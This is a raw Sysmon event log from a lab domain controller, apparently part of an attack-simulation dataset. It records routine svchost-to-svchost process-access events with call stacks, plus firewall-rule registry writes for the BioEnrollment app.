13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.117{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-3845273463-1331427702-1186551195-1148109977|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|M=microsoft.bioenrollment_cw5n1h2txyewy|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\|PFN=Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy| 13241300x800000000000000010458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.102{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{51DA62D0-837B-4B0E-B7AC-5C186E2A316C}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 13241300x800000000000000010457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.102{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B6554203-81C7-4341-9319-DDF5B1E861C3}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 10341000x800000000000000010456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 